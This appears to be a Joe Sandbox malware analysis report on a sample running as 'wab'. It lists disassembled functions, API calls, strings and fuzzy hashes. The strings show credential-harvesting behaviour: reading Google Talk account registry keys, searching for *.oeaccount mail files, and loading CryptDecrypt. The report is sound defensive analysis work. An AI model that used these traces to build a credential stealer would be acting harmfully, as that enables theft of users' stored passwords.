                                                                                    • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                                                    • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                                                    • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083E9
                                                                                    • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083F8
                                                                                    • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                                  • memset.MSVCRT ref: 00408620
                                                                                    • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                  • memset.MSVCRT ref: 00408671
                                                                                  • RegCloseKey.ADVAPI32(?,?,?), ref: 004086AF
                                                                                  • RegCloseKey.ADVAPI32(?), ref: 004086D6
                                                                                  Strings
                                                                                  • Software\Google\Google Talk\Accounts, xrefs: 004085F1
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: memset$ByteCharCloseMultiNameWidestrlen$ComputerEnumOpenUser
                                                                                  • String ID: Software\Google\Google Talk\Accounts
                                                                                  • API String ID: 1366857005-1079885057
                                                                                  • Opcode ID: b24b9a54dcd0214932f6ac2563ed0d1b1cb372bdd45dc4bf833f1fe5ea734f55
                                                                                  • Instruction ID: c9a55fd20ea1a9e1148d2ba128c2c272dfe10edd9ec9a97c612e1cc238572be2
                                                                                  • Opcode Fuzzy Hash: b24b9a54dcd0214932f6ac2563ed0d1b1cb372bdd45dc4bf833f1fe5ea734f55
                                                                                  • Instruction Fuzzy Hash: 6E2181B140830AAEE610EF51DD42EAFB7DCEF94344F00083EB984D1192E675D95D9BAB
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 441 40ba28-40ba3a 442 40ba87-40ba9b call 406c62 441->442 443 40ba3c-40ba52 call 407e20 _mbsicmp 441->443 465 40ba9d call 4107f1 442->465 466 40ba9d call 404734 442->466 467 40ba9d call 404785 442->467 468 40ba9d call 403c16 442->468 469 40ba9d call 410a9c 442->469 448 40ba54-40ba6d call 407e20 443->448 449 40ba7b-40ba85 443->449 455 40ba74 448->455 456 40ba6f-40ba72 448->456 449->442 449->443 451 40baa0-40bab3 call 407e30 457 40bab5-40bac1 451->457 458 40bafa-40bb09 SetCursor 451->458 459 40ba75-40ba76 call 40b5e5 455->459 456->459 460 40bac3-40bace 457->460 461 40bad8-40baf7 qsort 457->461 459->449 460->461 461->458 465->451 466->451 467->451 468->451 469->451
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: Cursor_mbsicmpqsort
                                                                                  • String ID: /nosort$/sort
                                                                                  • API String ID: 882979914-1578091866
                                                                                  • Opcode ID: eeec834885b89caefbd260ac574d55a400450caca1ca348474599114d02fe8b5
                                                                                  • Instruction ID: 8a1fc52e493d51bfa0df36ad286e8752cb28bf69c391dd95ac0f49afa8242728
                                                                                  • Opcode Fuzzy Hash: eeec834885b89caefbd260ac574d55a400450caca1ca348474599114d02fe8b5
                                                                                  • Instruction Fuzzy Hash: 2D2192B1704601EFD719AF75C880A69B7A9FF48318B10027EF419A7291CB39BC12CBD9
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                    • Part of subcall function 00410D0E: LoadLibraryA.KERNEL32(shell32.dll,00410DCA,00000104), ref: 00410D1C
                                                                                    • Part of subcall function 00410D0E: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00410D31
                                                                                  • memset.MSVCRT ref: 00410E10
                                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                                                                                  • _mbscpy.MSVCRT ref: 00410E87
                                                                                    • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                                                                  Strings
                                                                                  • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00410E2B, 00410E3B
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressCloseLibraryLoadProcVersion_mbscpymemset
                                                                                  • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                  • API String ID: 889583718-2036018995
                                                                                  • Opcode ID: ed5743d336984a8c18282994424b44d0bcfcd120d49097e0ee850cbc5c972bb8
                                                                                  • Instruction ID: 345612a4203e2947e26158410096d7c3d27216bde768142914c78e2e12d87323
                                                                                  • Opcode Fuzzy Hash: ed5743d336984a8c18282994424b44d0bcfcd120d49097e0ee850cbc5c972bb8
                                                                                  • Instruction Fuzzy Hash: 89110D71C40318EBEB20B6D59C86EEF77ACDB14304F1404A7F555A2112E7BC9ED8C69A
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • FindResourceA.KERNEL32(?,?,?), ref: 00410C75
                                                                                  • SizeofResource.KERNEL32(?,00000000), ref: 00410C86
                                                                                  • LoadResource.KERNEL32(?,00000000), ref: 00410C96
                                                                                  • LockResource.KERNEL32(00000000), ref: 00410CA1
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: Resource$FindLoadLockSizeof
                                                                                  • String ID:
                                                                                  • API String ID: 3473537107-0
                                                                                  • Opcode ID: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                                                                                  • Instruction ID: 06b8370cebe37c7de172ca18b7cbf64f7437cd91f528590ddf6fb1777473d23a
                                                                                  • Opcode Fuzzy Hash: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                                                                                  • Instruction Fuzzy Hash: 090196367012166F8B185F69DD9489F7EAEFB853913084136FC05C6361EB71C9818ED8
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • memset.MSVCRT ref: 004109F7
                                                                                    • Part of subcall function 004075CD: sprintf.MSVCRT ref: 00407605
                                                                                    • Part of subcall function 004075CD: memcpy.MSVCRT ref: 00407618
                                                                                  • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00410A1B
                                                                                  • memset.MSVCRT ref: 00410A32
                                                                                  • GetPrivateProfileStringA.KERNEL32(?,?,0044C52F,?,00002000,?), ref: 00410A50
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: PrivateProfileStringmemset$Writememcpysprintf
                                                                                  • String ID:
                                                                                  • API String ID: 3143880245-0
                                                                                  • Opcode ID: 06440367014e030cd30049a245fb0cc3fb8be964b179c0619a4e1c6a0770dea7
                                                                                  • Instruction ID: 950c872411b2f2d44c5e3370b52dcf3132a88c3cdc41bb294f16927293e6b240
                                                                                  • Opcode Fuzzy Hash: 06440367014e030cd30049a245fb0cc3fb8be964b179c0619a4e1c6a0770dea7
                                                                                  • Instruction Fuzzy Hash: A401A172804319BBEF119F50DC86EDB7B7CEF05344F0000A6F604A2052E635AA64CBA9
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: ??2@
                                                                                  • String ID:
                                                                                  • API String ID: 1033339047-0
                                                                                  • Opcode ID: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
                                                                                  • Instruction ID: b7305a6f8e60e4354fc193aeb8e5872e67636dbc7b7f4d43fc505f02bd19535d
                                                                                  • Opcode Fuzzy Hash: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
                                                                                  • Instruction Fuzzy Hash: EEF031F05433615EEB559F34ED0672536A4E784302F024B3EE2059A2E6EB78D4908B09
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: ??3@mallocmemcpy
                                                                                  • String ID:
                                                                                  • API String ID: 3831604043-0
                                                                                  • Opcode ID: a96fb65c017a86587ba071467795d458f8ca9669e817bb347d51b960c43a4168
                                                                                  • Instruction ID: 20c18abb4fba39fec419649699297209b7413d51c31022bf8d4f5bc21a778af6
                                                                                  • Opcode Fuzzy Hash: a96fb65c017a86587ba071467795d458f8ca9669e817bb347d51b960c43a4168
                                                                                  • Instruction Fuzzy Hash: 39F0E9726092235FD7089E7AB881D0BB3ADEF94324711482FF445E7281D738EC60C6A8
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                    • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                                                                    • Part of subcall function 00406FC7: _mbscpy.MSVCRT ref: 00407011
                                                                                  • CreateFontIndirectA.GDI32(?), ref: 004070A6
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateFontIndirect_mbscpymemset
                                                                                  • String ID: Arial
                                                                                  • API String ID: 3853255127-493054409
                                                                                  • Opcode ID: a9edf0add2530cae1e73dc887b0500a6e6731c557fb9a9d8b72d1c15ab1f178d
                                                                                  • Instruction ID: 3e85f73e1de40fb669f60d67ce34a2ecc2b5129f84855d11383e820b071861b9
                                                                                  • Opcode Fuzzy Hash: a9edf0add2530cae1e73dc887b0500a6e6731c557fb9a9d8b72d1c15ab1f178d
                                                                                  • Instruction Fuzzy Hash: FDD0C9A0E4020D67D710F7A0FD47F49776C5B00604F510831B905F10E1EAA4A1184A99
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: ProtectVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 544645111-0
                                                                                  • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                  • Instruction ID: 9d5022db8ba3b04779ac2e9664088e7462d9cf1087a2f4409b49694314ac1291
                                                                                  • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                  • Instruction Fuzzy Hash: FB21F7114496816FFB218BB84C017B67BD8DB13364F19469BE184CB243D76CD85693FA
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                    • Part of subcall function 00401E69: memset.MSVCRT ref: 00401E8B
                                                                                    • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EA4
                                                                                    • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EB2
                                                                                    • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EF8
                                                                                    • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401F06
                                                                                  • _strcmpi.MSVCRT ref: 0040CEC3
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: strlen$_strcmpimemset
                                                                                  • String ID: /stext
                                                                                  • API String ID: 520177685-3817206916
                                                                                  • Opcode ID: 8aa79a490ab9c6e021e7ced4863df28004c69c197a86612b5f6291033182a9ac
                                                                                  • Instruction ID: 693fdb5656bfadad22d3d4febeb48e05c11e25f360cf1d4a61822c7fe8fbaaaa
                                                                                  • Opcode Fuzzy Hash: 8aa79a490ab9c6e021e7ced4863df28004c69c197a86612b5f6291033182a9ac
                                                                                  • Instruction Fuzzy Hash: 5B210C71614112DFC3589B39C8C1966B3A9BF45314B15427FA91AAB392C738EC119BC9
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: ProtectVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 544645111-0
                                                                                  • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                  • Instruction ID: 5df47aada64e755ddaac71019e2cddcac14d14db73bdb0f929895f2225ac57a9
                                                                                  • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                  • Instruction Fuzzy Hash: DB012D01545A4179FF21AAB50C02ABB5F8CDA23364B145B4BF750CB293DB5CC90693FE
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                                                                                  • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: ProtectVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 544645111-0
                                                                                  • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                  • Instruction ID: 565c9894d902a96607ae12053a83652f4dbbb150929c791eaa1536a67b179355
                                                                                  • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                  • Instruction Fuzzy Hash: 83F0C201589A407DFE2155B50C42ABB5B8CCA27320B244B07F654CB383D79DC91A93FA
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                    • Part of subcall function 00404785: FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                                                                                  • LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: Library$AddressFreeLoadProc
                                                                                  • String ID:
                                                                                  • API String ID: 145871493-0
                                                                                  • Opcode ID: e4129e6d3a026a155dd617c709f60e93ed044a3dbb6052f4ffd7ea6f87d7a192
                                                                                  • Instruction ID: d196b3276b1a656cda378f5c53e28a4a33de773bbf59b12af1a3f4d2ec041ade
                                                                                  • Opcode Fuzzy Hash: e4129e6d3a026a155dd617c709f60e93ed044a3dbb6052f4ffd7ea6f87d7a192
                                                                                  • Instruction Fuzzy Hash: 35F065F8500B039BD7606F34D84879BB3E9AF86310F00453EF961A3281EB38E541CB58
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00410A92
                                                                                    • Part of subcall function 00410983: memset.MSVCRT ref: 004109A1
                                                                                    • Part of subcall function 00410983: _itoa.MSVCRT ref: 004109B8
                                                                                    • Part of subcall function 00410983: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 004109C7
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: PrivateProfile$StringWrite_itoamemset
                                                                                  • String ID:
                                                                                  • API String ID: 4165544737-0
                                                                                  • Opcode ID: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                                                  • Instruction ID: e4187046b5889157fb54d5f6e3f9ccfafaefd38d22cef98a7399574687248963
                                                                                  • Opcode Fuzzy Hash: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                                                  • Instruction Fuzzy Hash: 3DE0B63204020DBFDF125F90EC01AA97B66FF14355F14845AF95804131D37295B0AF94
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: FreeLibrary
                                                                                  • String ID:
                                                                                  • API String ID: 3664257935-0
                                                                                  • Opcode ID: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                                                  • Instruction ID: 8a1fb59f4aee03ee333bbcbb21747f572c22b5e480e1b07aa067c0b07a2bbf9c
                                                                                  • Opcode Fuzzy Hash: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                                                  • Instruction Fuzzy Hash: D2D012750013118FD7605F14FC4CBA173E8AF41312F1504B8E990A7196C3389540CA58
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • CreateFileA.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040AEA3,00000000), ref: 00406D2C
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateFile
                                                                                  • String ID:
                                                                                  • API String ID: 823142352-0
                                                                                  • Opcode ID: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                                                  • Instruction ID: b62e2d47ef034db7175ca84798afaf0fa2498f7b6fd9cc80310e9c1c0838826b
                                                                                  • Opcode Fuzzy Hash: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                                                  • Instruction Fuzzy Hash: 59C012F02503007EFF204F10AC4BF37355DE780700F204420BE00E40E2C2A14C008928
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: FreeLibrary
                                                                                  • String ID:
                                                                                  • API String ID: 3664257935-0
                                                                                  • Opcode ID: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                                                  • Instruction ID: 34cea44665fc180de0fd44d6926484b1362fa2b4776eba2aa4e53c033fc5eded
                                                                                  • Opcode Fuzzy Hash: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                                                  • Instruction Fuzzy Hash: 8CC04C355107018BE7219B12C949763B7E4BB00316F54C81894A695454D77CE494CE18
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • EnumResourceNamesA.KERNEL32(?,?,Function_00010C68,00000000), ref: 00410D02
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: EnumNamesResource
                                                                                  • String ID:
                                                                                  • API String ID: 3334572018-0
                                                                                  • Opcode ID: b3588a68add1f6d45fd601d09e3ffe49e4267215e4b3f537158054a437bee868
                                                                                  • Instruction ID: 5afcab74deb5f1f746bbc86617496166ce7982b7e139a3a4a0d32d3f52cd2e16
                                                                                  • Opcode Fuzzy Hash: b3588a68add1f6d45fd601d09e3ffe49e4267215e4b3f537158054a437bee868
                                                                                  • Instruction Fuzzy Hash: 05C09B3119534197C7519F108C4DF1B7695BB59706F144D297191940A4D7514054DE05
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • FindClose.KERNELBASE(?,00407EAA,?,?,00000000,ACD,0044424D,*.oeaccount,ACD,?,00000104), ref: 00407F9A
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseFind
                                                                                  • String ID:
                                                                                  • API String ID: 1863332320-0
                                                                                  • Opcode ID: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                                                  • Instruction ID: 6a16c08ea37d16c8a4aa15d9076e95747955e6fceefd1cb8b530e80fb020b3ed
                                                                                  • Opcode Fuzzy Hash: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                                                  • Instruction Fuzzy Hash: 6DC092746165029FD22C5F38ECA942A77A1AF4A7303B80F6CE0F3D20F0E73898528A04
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • RegOpenKeyExA.KERNELBASE(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: Open
                                                                                  • String ID:
                                                                                  • API String ID: 71445658-0
                                                                                  • Opcode ID: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
                                                                                  • Instruction ID: dc05f55a30c25c5fac933af4dde5d03becff9f0601af4caa575784a6c8c77920
                                                                                  • Opcode Fuzzy Hash: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
                                                                                  • Instruction Fuzzy Hash: F4C09B35545301FFDE114F40FD45F09BB61AB84B05F004414B244240B182714414EB17
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: AttributesFile
                                                                                  • String ID:
                                                                                  • API String ID: 3188754299-0
                                                                                  • Opcode ID: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                                                  • Instruction ID: 9c49554ec541f0f53bfa1b31c7f3910b3cb34ca890cc3578c2bd02f8d22bfc28
                                                                                  • Opcode Fuzzy Hash: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                                                  • Instruction Fuzzy Hash: 0CB012B92110004BCB0807349C8904D36505F456317240B3CB033C01F0D720CCA0BE00
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • LoadLibraryA.KERNEL32(advapi32.dll,?,00404A70,?,00404986,?,?,00000000,?,00000000,?), ref: 004047DA
                                                                                  • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 004047EE
                                                                                  • GetProcAddress.KERNEL32(0045A9A8,CryptReleaseContext), ref: 004047FA
                                                                                  • GetProcAddress.KERNEL32(0045A9A8,CryptCreateHash), ref: 00404806
                                                                                  • GetProcAddress.KERNEL32(0045A9A8,CryptGetHashParam), ref: 00404812
                                                                                  • GetProcAddress.KERNEL32(0045A9A8,CryptHashData), ref: 0040481E
                                                                                  • GetProcAddress.KERNEL32(0045A9A8,CryptDestroyHash), ref: 0040482A
                                                                                  • GetProcAddress.KERNEL32(0045A9A8,CryptDecrypt), ref: 00404836
                                                                                  • GetProcAddress.KERNEL32(0045A9A8,CryptDeriveKey), ref: 00404842
                                                                                  • GetProcAddress.KERNEL32(0045A9A8,CryptImportKey), ref: 0040484E
                                                                                  • GetProcAddress.KERNEL32(0045A9A8,CryptDestroyKey), ref: 0040485A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressProc$LibraryLoad
                                                                                  • String ID: CryptAcquireContextA$CryptCreateHash$CryptDecrypt$CryptDeriveKey$CryptDestroyHash$CryptDestroyKey$CryptGetHashParam$CryptHashData$CryptImportKey$CryptReleaseContext$advapi32.dll
                                                                                  • API String ID: 2238633743-192783356
                                                                                  • Opcode ID: cd939ae61559ee60ed20598dae0af8bfb6f23e93240650da69a7d260c9c9fdd8
                                                                                  • Instruction ID: 70faa285c49fb169990c8fbe2f493e995bb0ef80ad344915aa685f594b7479e2
                                                                                  • Opcode Fuzzy Hash: cd939ae61559ee60ed20598dae0af8bfb6f23e93240650da69a7d260c9c9fdd8
                                                                                  • Instruction Fuzzy Hash: 1101C978E40744AEDB316F76CC09E06BEE1EF9C7047214D2EE1C153650D77AA011DE48
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • EmptyClipboard.USER32 ref: 00406E06
                                                                                    • Part of subcall function 00406D01: CreateFileA.KERNEL32(eBD,80000000,00000001,00000000,00000003,00000000,00000000,004441A1,?,ACD,00444265,?,?,*.oeaccount,ACD,?), ref: 00406D13
                                                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 00406E23
                                                                                  • GlobalAlloc.KERNEL32(00002000,00000001), ref: 00406E34
                                                                                  • GlobalFix.KERNEL32(00000000), ref: 00406E41
                                                                                  • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406E54
                                                                                  • GlobalUnWire.KERNEL32(00000000), ref: 00406E63
                                                                                  • SetClipboardData.USER32(00000001,00000000), ref: 00406E6C
                                                                                  • GetLastError.KERNEL32 ref: 00406E74
